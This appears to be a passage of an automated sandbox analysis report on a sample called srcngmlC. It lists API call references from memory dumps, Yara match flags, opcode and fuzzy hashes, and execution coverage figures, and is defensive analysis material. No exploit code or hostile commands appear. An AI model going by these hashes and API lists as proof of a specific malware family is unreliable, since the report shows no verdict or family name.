                                                                                                                                            • Snapshot File: hcaresult_5_2_35560000_srcngmlC.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: e299959c5b53f3d5c6089b3169976bdc4c0c6970f14b538b8220d2749e9c8e76
                                                                                                                                            • Instruction ID: 51e0fb28aa04e524d9cc10a32ad2321a47154ad39bb6bf4006c0007875ea6f1a
                                                                                                                                            • Opcode Fuzzy Hash: e299959c5b53f3d5c6089b3169976bdc4c0c6970f14b538b8220d2749e9c8e76
                                                                                                                                            • Instruction Fuzzy Hash: 73D0A9BA2026644F8B162AB0A1141EA3F549A852A9302808BE0C867226CF304E029780
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.1880435036.0000000035560000.00000040.00000800.00020000.00000000.sdmp, Offset: 35560000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_5_2_35560000_srcngmlC.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 3a022ca54e822c73afde60331bad2ebd57b8f0fe4f8cc4dce94441c2bbcc810b
                                                                                                                                            • Instruction ID: 312cf2bff268e824ee86e38c83eb4c01f98ae5980342cf4a0b5fdbc23d564b33
                                                                                                                                            • Opcode Fuzzy Hash: 3a022ca54e822c73afde60331bad2ebd57b8f0fe4f8cc4dce94441c2bbcc810b
                                                                                                                                            • Instruction Fuzzy Hash: 86C09B312113255B4A1477F9E4448DF779DDA855653008157F54D53301DEB5AC1247D9
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.1880435036.0000000035560000.00000040.00000800.00020000.00000000.sdmp, Offset: 35560000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_5_2_35560000_srcngmlC.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: c67e8fcc978cc12576433c755b7dc27b6aca986fefc31e32c1c3537af3b178a8
                                                                                                                                            • Instruction ID: 289cea32f71e6d9cf8a88e7b515c35ece0577ef34d41b4f4a4fcbaf190f5ce1c
                                                                                                                                            • Opcode Fuzzy Hash: c67e8fcc978cc12576433c755b7dc27b6aca986fefc31e32c1c3537af3b178a8
                                                                                                                                            • Instruction Fuzzy Hash: 8FC08C255451C8CBEB009694A40C2CCBB74E78027AF8020A3D51A620068BA920EAC7AA
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • IsDebuggerPresent.KERNEL32 ref: 004136F4
                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00413709
                                                                                                                                            • UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 00413714
                                                                                                                                            • GetCurrentProcess.KERNEL32(C0000409), ref: 00413730
                                                                                                                                            • TerminateProcess.KERNEL32(00000000), ref: 00413737
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.1851440244.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.1851440244.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_srcngmlC.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2579439406-0
                                                                                                                                            • Opcode ID: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                                                                                            • Instruction ID: 93bf0ba95bc2a0faef8203f21c221f33afe887fd41373e09ae0fa508b254143b
                                                                                                                                            • Opcode Fuzzy Hash: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                                                                                            • Instruction Fuzzy Hash: A521C3B4601204EFD720DF65E94A6457FB4FB08356F80407AE50887772E7B86682CF4D
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetProcessHeap.KERNEL32 ref: 0040ADD0
                                                                                                                                            • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040ADE1
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.1851440244.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.1851440244.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_srcngmlC.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Heap$FreeProcess
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3859560861-0
                                                                                                                                            • Opcode ID: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
                                                                                                                                            • Instruction ID: 72dd180cd7110ee49b406fd12918c6a771032a3efea8c67e715e4993f3fed615
                                                                                                                                            • Opcode Fuzzy Hash: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
                                                                                                                                            • Instruction Fuzzy Hash: 54E09A312003009FC320AB61DC08FA337AAEF88311F04C829E55A936A0DB78EC42CB58
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_000123AF), ref: 004123F6
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.1851440244.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.1851440244.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_srcngmlC.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3192549508-0
                                                                                                                                            • Opcode ID: 4924e8eeaf860e2c76ee0bfea96ab0c911441afc8f12962253436aa9ca0899ee
                                                                                                                                            • Instruction ID: 17be93bd3878235df00445469c4c747c8dbd7a907b9f456768254b9c32cbcc1b
                                                                                                                                            • Opcode Fuzzy Hash: 4924e8eeaf860e2c76ee0bfea96ab0c911441afc8f12962253436aa9ca0899ee
                                                                                                                                            • Instruction Fuzzy Hash: CA900270661144D7865017705D0968669949B4C6427618471653DD4098DBAA40505569
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004170B3
                                                                                                                                            • GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,00000000), ref: 004170C5
                                                                                                                                            • MultiByteToWideChar.KERNEL32(7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 00417151
                                                                                                                                            • _malloc.LIBCMT ref: 0041718A
                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171BD
                                                                                                                                            • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171D9
                                                                                                                                            • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 00417213
                                                                                                                                            • _malloc.LIBCMT ref: 0041724C
                                                                                                                                            • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 00417277
                                                                                                                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 0041729A
                                                                                                                                            • __freea.LIBCMT ref: 004172A4
                                                                                                                                            • __freea.LIBCMT ref: 004172AD
                                                                                                                                            • ___ansicp.LIBCMT ref: 004172DE
                                                                                                                                            • ___convertcp.LIBCMT ref: 00417309
                                                                                                                                            • LCMapStringA.KERNEL32(?,?,00000000,?,00000000,00000000,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?), ref: 0041732A
                                                                                                                                            • _malloc.LIBCMT ref: 00417362
                                                                                                                                            • _memset.LIBCMT ref: 00417384
                                                                                                                                            • LCMapStringA.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?), ref: 0041739C
                                                                                                                                            • ___convertcp.LIBCMT ref: 004173BA
                                                                                                                                            • __freea.LIBCMT ref: 004173CF
                                                                                                                                            • LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004173E9
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000001.1683699497.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000001.1683699497.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_5_1_400000_srcngmlC.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: String$ByteCharMultiWide__freea_malloc$___convertcp$ErrorLast___ansicp_memset
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3809854901-0
                                                                                                                                            • Opcode ID: 6e0241b6e147b769e02d4c25b4a62de63cd09900d226416504aadb47099bd534
                                                                                                                                            • Instruction ID: cdfffc9a1d2b3026f9ae82d5cc8d175594050d3ba9b5f3d3ede674b9b5b9b85c
                                                                                                                                            • Opcode Fuzzy Hash: 6e0241b6e147b769e02d4c25b4a62de63cd09900d226416504aadb47099bd534
                                                                                                                                            • Instruction Fuzzy Hash: 29B1B072908119EFCF119FA0CC808EF7BB5EF48354B14856BF915A2260D7398DD2DB98
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • _malloc.LIBCMT ref: 004057DE
                                                                                                                                              • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                                                                                                              • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                                                                                              • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                                                                                                            • _malloc.LIBCMT ref: 00405842
                                                                                                                                            • _malloc.LIBCMT ref: 00405906
                                                                                                                                            • _malloc.LIBCMT ref: 00405930
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000001.1683699497.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000001.1683699497.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_5_1_400000_srcngmlC.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _malloc$AllocateHeap
                                                                                                                                            • String ID: 1.2.3
                                                                                                                                            • API String ID: 680241177-2310465506
                                                                                                                                            • Opcode ID: dcd0ffeba55ff02fe10acfaeba0fa9d55be123b2b31187241ea46178cf7d6550
                                                                                                                                            • Instruction ID: 6f54ea0e5a0cddcbb7a6eab5c61130b8c10e9e343dc86a4c4a61a5a67c51a18e
                                                                                                                                            • Opcode Fuzzy Hash: dcd0ffeba55ff02fe10acfaeba0fa9d55be123b2b31187241ea46178cf7d6550
                                                                                                                                            • Instruction Fuzzy Hash: 8B61F7B1944B408FD720AF2A888066BBBE0FB45314F548D3FE5D5A3781D739D8498F5A
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000001.1683699497.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000001.1683699497.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_5_1_400000_srcngmlC.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3886058894-0
                                                                                                                                            • Opcode ID: bd76f0579c09bb0a6f952e3feb4c94488d7cfab1bd6474dd60967b9cc6db7677
                                                                                                                                            • Instruction ID: 0234425abcb0213f77efd30778ac7634d7a408156a07f93f58cd91f86a00e979
                                                                                                                                            • Opcode Fuzzy Hash: bd76f0579c09bb0a6f952e3feb4c94488d7cfab1bd6474dd60967b9cc6db7677
                                                                                                                                            • Instruction Fuzzy Hash: 1E519031A00605ABCB209F69C844A9FBB75EF41324F24863BF825B22D1D7799E51CBDD
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • EntryPoint.SRCNGMLC(80070057), ref: 004017EE
                                                                                                                                              • Part of subcall function 00401030: RaiseException.KERNEL32(-0000000113D97C15,00000001,00000000,00000000,00000015,2C2D8410), ref: 0040101C
                                                                                                                                              • Part of subcall function 00401030: GetLastError.KERNEL32 ref: 00401030
                                                                                                                                            • EntryPoint.SRCNGMLC(80070057), ref: 00401800
                                                                                                                                            • EntryPoint.SRCNGMLC(80070057), ref: 00401813
                                                                                                                                            • __recalloc.LIBCMT ref: 00401828
                                                                                                                                            • EntryPoint.SRCNGMLC(8007000E), ref: 00401839
                                                                                                                                            • EntryPoint.SRCNGMLC(8007000E), ref: 00401853
                                                                                                                                            • _calloc.LIBCMT ref: 00401861
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000001.1683699497.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000001.1683699497.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_5_1_400000_srcngmlC.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: EntryPoint$ErrorExceptionLastRaise__recalloc_calloc
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1721462702-0
                                                                                                                                            • Opcode ID: a5ad3cd8a15542cfcc4b59831b28fc936e8548016bd987b06b7189672beebcc8
                                                                                                                                            • Instruction ID: 9b44c07ae4757e317c030d83b628f3e382e80143504443e1f3b2735d650bea0f
                                                                                                                                            • Opcode Fuzzy Hash: a5ad3cd8a15542cfcc4b59831b28fc936e8548016bd987b06b7189672beebcc8
                                                                                                                                            • Instruction Fuzzy Hash: AC018872500241EACA21BA229C06F1B7294DF90799F24893FF4C5762E2D63D9990D6EE
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • __getptd.LIBCMT ref: 00414744
                                                                                                                                              • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                                                                                                              • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                                                                                                            • __getptd.LIBCMT ref: 0041475B
                                                                                                                                            • __amsg_exit.LIBCMT ref: 00414769
                                                                                                                                            • __lock.LIBCMT ref: 00414779
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000001.1683699497.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000001.1683699497.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_5_1_400000_srcngmlC.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                                                                            • String ID: @.B
                                                                                                                                            • API String ID: 3521780317-470711618
                                                                                                                                            • Opcode ID: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                                                                                                            • Instruction ID: 91aff3cf2d6bbea4e2ea5d49e8e08bf0f41c3eb50374f8394f27d7b6c467aa53
                                                                                                                                            • Opcode Fuzzy Hash: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                                                                                                            • Instruction Fuzzy Hash: 60F09631A407009BE720BB66850678D73A06F81719F91456FE4646B2D1CB7C6981CA5D
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • __lock_file.LIBCMT ref: 0040C6C8
                                                                                                                                            • __fileno.LIBCMT ref: 0040C6D6
                                                                                                                                            • __fileno.LIBCMT ref: 0040C6E2
                                                                                                                                            • __fileno.LIBCMT ref: 0040C6EE
                                                                                                                                            • __fileno.LIBCMT ref: 0040C6FE
                                                                                                                                              • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                                                                              • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000001.1683699497.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000001.1683699497.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_5_1_400000_srcngmlC.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: __fileno$__decode_pointer__getptd_noexit__lock_file
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2805327698-0
                                                                                                                                            • Opcode ID: 0562b983a982954f07d72bd2f01eb344b0d1ff129a9d588568d63b7b4b77f5f9
                                                                                                                                            • Instruction ID: db056c5abb1484b678344f3d998e50672bc49cccd6cfe868de5707b4f3f6250f
                                                                                                                                            • Opcode Fuzzy Hash: 0562b983a982954f07d72bd2f01eb344b0d1ff129a9d588568d63b7b4b77f5f9
                                                                                                                                            • Instruction Fuzzy Hash: 1A01253231451096C261ABBE5CC246E76A0DE81734726877FF024BB1D2DB3C99429E9D
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • __getptd.LIBCMT ref: 00413FD8
                                                                                                                                              • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                                                                                                              • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                                                                                                            • __amsg_exit.LIBCMT ref: 00413FF8
                                                                                                                                            • __lock.LIBCMT ref: 00414008
                                                                                                                                            • InterlockedDecrement.KERNEL32(?), ref: 00414025
                                                                                                                                            • InterlockedIncrement.KERNEL32(00422910), ref: 00414050
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000001.1683699497.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000001.1683699497.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_5_1_400000_srcngmlC.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4271482742-0
                                                                                                                                            • Opcode ID: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                                                                                                            • Instruction ID: 77fb08d543caf33888dccec20a3998fa005b1348dfeb798e4aa279577202aa48
                                                                                                                                            • Opcode Fuzzy Hash: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                                                                                                            • Instruction Fuzzy Hash: 9301A531A01621ABD724AF67990579E7B60AF48764F50442BE814B72D0C77C6DC2CBDD
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetModuleHandleA.KERNEL32(KERNEL32,0040CDF5), ref: 00413615
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00413625
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000001.1683699497.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000001.1683699497.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_5_1_400000_srcngmlC.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                                                            • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                                                            • API String ID: 1646373207-3105848591
                                                                                                                                            • Opcode ID: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                                                                                                            • Instruction ID: 3bb3582238f4ecb0ba7b9e8fe578e45fdcf0af3c55e5dfe2a5e3893bc0ad87fb
                                                                                                                                            • Opcode Fuzzy Hash: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                                                                                                            • Instruction Fuzzy Hash: 96F06230600A09E2DB105FA1ED1E2EFBB74BB80746F5101A19196B0194DF38D0B6825A
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • __fileno.LIBCMT ref: 0040C77C
                                                                                                                                            • __locking.LIBCMT ref: 0040C791
                                                                                                                                              • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                                                                              • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000001.1683699497.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000001.1683699497.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_5_1_400000_srcngmlC.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: __decode_pointer__fileno__getptd_noexit__locking
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2395185920-0
                                                                                                                                            • Opcode ID: 0afeae9b27a86c2abe0b3397de8921379debd9150d07dd18b85413c6fc1de43d
                                                                                                                                            • Instruction ID: 30055f4621fb528cea72007990449f1feb1a7f288d573051c200dc5e1a244c20
                                                                                                                                            • Opcode Fuzzy Hash: 0afeae9b27a86c2abe0b3397de8921379debd9150d07dd18b85413c6fc1de43d
                                                                                                                                            • Instruction Fuzzy Hash: CC51CF72E00209EBDB10AF69C9C0B59BBA1AF01355F14C27AD915B73D1D378AE41DB8D
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000001.1683699497.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000001.1683699497.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_5_1_400000_srcngmlC.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _fseek_malloc_memset
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 208892515-0
                                                                                                                                            • Opcode ID: 9872aa7f1147e6bc872b805e495ff45a5b2212b2fe58f3118e87b4f331b1c2a2
                                                                                                                                            • Instruction ID: b5a371ba5f9a3ad1fa090fb1a89082137fe8d6c03bc5c52cd66242ccf2a60741
                                                                                                                                            • Opcode Fuzzy Hash: 9872aa7f1147e6bc872b805e495ff45a5b2212b2fe58f3118e87b4f331b1c2a2
                                                                                                                                            • Instruction Fuzzy Hash: 3541A572600F018AD630972EE804B2772E5DF90364F140A3FE9E6E27D5E738E9458F89
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004152D3
                                                                                                                                            • __isleadbyte_l.LIBCMT ref: 00415307
                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,00000083,?,?,00000000,?,?,?), ref: 00415338
                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,00000083,00000001,?,00000000,?,?,?), ref: 004153A6
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000001.1683699497.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000001.1683699497.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_5_1_400000_srcngmlC.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3058430110-0
                                                                                                                                            • Opcode ID: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                                                                                                            • Instruction ID: 094900ada7e667e90e346a2540d450e67f5821ec0926a3c2ae07879bc245b0d1
                                                                                                                                            • Opcode Fuzzy Hash: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                                                                                                            • Instruction Fuzzy Hash: 1831A032A00649EFDB20DFA4C8809EE7BB5EF41350B1885AAE8659B291D374DD80DF59
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000001.1683699497.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000001.1683699497.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_5_1_400000_srcngmlC.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3016257755-0
                                                                                                                                            • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                            • Instruction ID: bfd0e68975b3765f24e543ba70b005e9871d43ed2f52156b65e62ceec70126f9
                                                                                                                                            • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                            • Instruction Fuzzy Hash: DA117E7200014EBBCF125E85CC418EE3F27BF18755B58841AFE2858130D73BCAB2AB89
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Execution Graph

                                                                                                                                            Execution Coverage:6.8%
                                                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                                                            Signature Coverage:0%
                                                                                                                                            Total number of Nodes:403
                                                                                                                                            Total number of Limit Nodes:28
